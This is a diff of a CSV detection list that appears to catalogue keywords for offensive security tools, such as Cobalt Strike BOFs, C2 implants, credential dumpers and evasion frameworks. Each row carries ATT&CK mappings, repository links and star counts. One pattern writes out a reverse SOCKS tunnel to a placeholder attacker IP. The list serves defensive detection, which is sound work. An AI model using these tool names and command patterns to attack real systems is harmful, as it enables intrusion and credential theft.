TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","1","54","1","2023-06-30T09:07:59Z","2023-01-26T20:44:06Z" -"*chromeKey.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*chromeKey.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - 
T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*chromeKey.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*chromeKey.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" "*chromepass.exe*","offensive_tool_keyword","chromepass","ChromePass is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry. the following information is displayed: Origin URL. Action URL. User Name Field. Password Field. User Name. Password. and Created Time. It allows you to get the passwords from your current running system. or from a user profile stored on external drive.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/chromepass.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*chromepass.zip*","offensive_tool_keyword","chromepass","ChromePass is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry. the following information is displayed: Origin URL. 
Action URL. User Name Field. Password Field. User Name. Password. and Created Time. It allows you to get the passwords from your current running system. or from a user profile stored on external drive.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/chromepass.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*chromiumkeydump *","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/crypt0p3g/bof-collection","1","0","N/A","N/A","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" 
@@ -8449,46 +8597,46 @@ "*ChromiumKeyDump.cpp*","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "*ChromiumKeyDump.exe*","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "*Chudry/Xerror*","offensive_tool_keyword","Xerror","fully automated pentesting tool","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Chudry/Xerror","1","1","N/A","N/A","5","458","106","2022-12-08T04:33:03Z","2019-08-16T21:20:52Z" -"*chunlie.exe*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*cHux014r17SG3v4gPUrZ0BZjDabMTY2eWDj1tuYdREBg*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" -"*chvancooten/nimbuild*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*chvancooten/NimPlant*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*chunlie.exe*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*cHux014r17SG3v4gPUrZ0BZjDabMTY2eWDj1tuYdREBg*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*chvancooten/nimbuild*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*chvancooten/NimPlant*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - 
TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*CIMplant.exe *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "*CIMplant.sln*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "*CIMplant-main*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" -"*cirt-default-usernames.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cirt-default-usernames.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*cirt-fuzzer*","offensive_tool_keyword","cirt-fuzzer","A simple TCP/UDP protocol fuzzer.","T1046 - T1065 - T1190 - T1219 - T1221 - T1497","TA0001 - TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Sniffing & Spoofing","https://www.ecrimelabs.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*cisco2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*cisco2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*cisco-phone-query.sh*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*Cleanup-57BFF48E-24FB-48E9-A390-AC62ADF38B07.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" "*clear_cmd","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" -"*clear_command_history.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*clear_command_history.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" "*ClearEventlog.vbs*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" -"*clem9669_wordlist_medium.7z*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","191","44","2023-10-03T14:28:50Z","2020-10-21T14:37:53Z" -"*clem9669_wordlist_small.7z*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","191","44","2023-10-03T14:28:50Z","2020-10-21T14:37:53Z" -"*-cli install github *","offensive_tool_keyword","mythic","A collaborative 
multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" +"*clem9669_wordlist_medium.7z*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","192","44","2023-10-04T14:27:37Z","2020-10-21T14:37:53Z" +"*clem9669_wordlist_small.7z*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","192","44","2023-10-04T14:27:37Z","2020-10-21T14:37:53Z" +"*-cli install github *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" "*-cli install github *Apollo.*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" -"*-cli payload start *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - 
T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" +"*-cli payload start *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" "*click_to_exploit.docx*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/drgreenthumb93/CVE-2022-30190-follina","1","1","N/A","N/A","1","10","4","2023-04-20T20:34:05Z","2022-06-01T11:37:08Z" -"*clickjack_attack.html*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*clickjack_victim.html*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*clickjack_attack.html*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*clickjack_victim.html*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*clickme*exploit.html*","offensive_tool_keyword","POC","CVE-2022-30190 Follina POC","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/onecloudemoji/CVE-2022-30190","1","1","N/A","N/A","2","107","33","2022-05-31T09:35:37Z","2022-05-31T06:45:25Z" "*client $ATTACKER-IP:$ATTACKER-PORT R:$PORT:socks*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*client.py --server-ip * --server-port *","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","10","10","490","125","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" "*client.py*--domain*--hashes*","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - 
TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","10","10","490","125","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" "*ClipboardImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*clipboardinject.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*clipboardinject.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*clipboardinject.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - 
T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z"
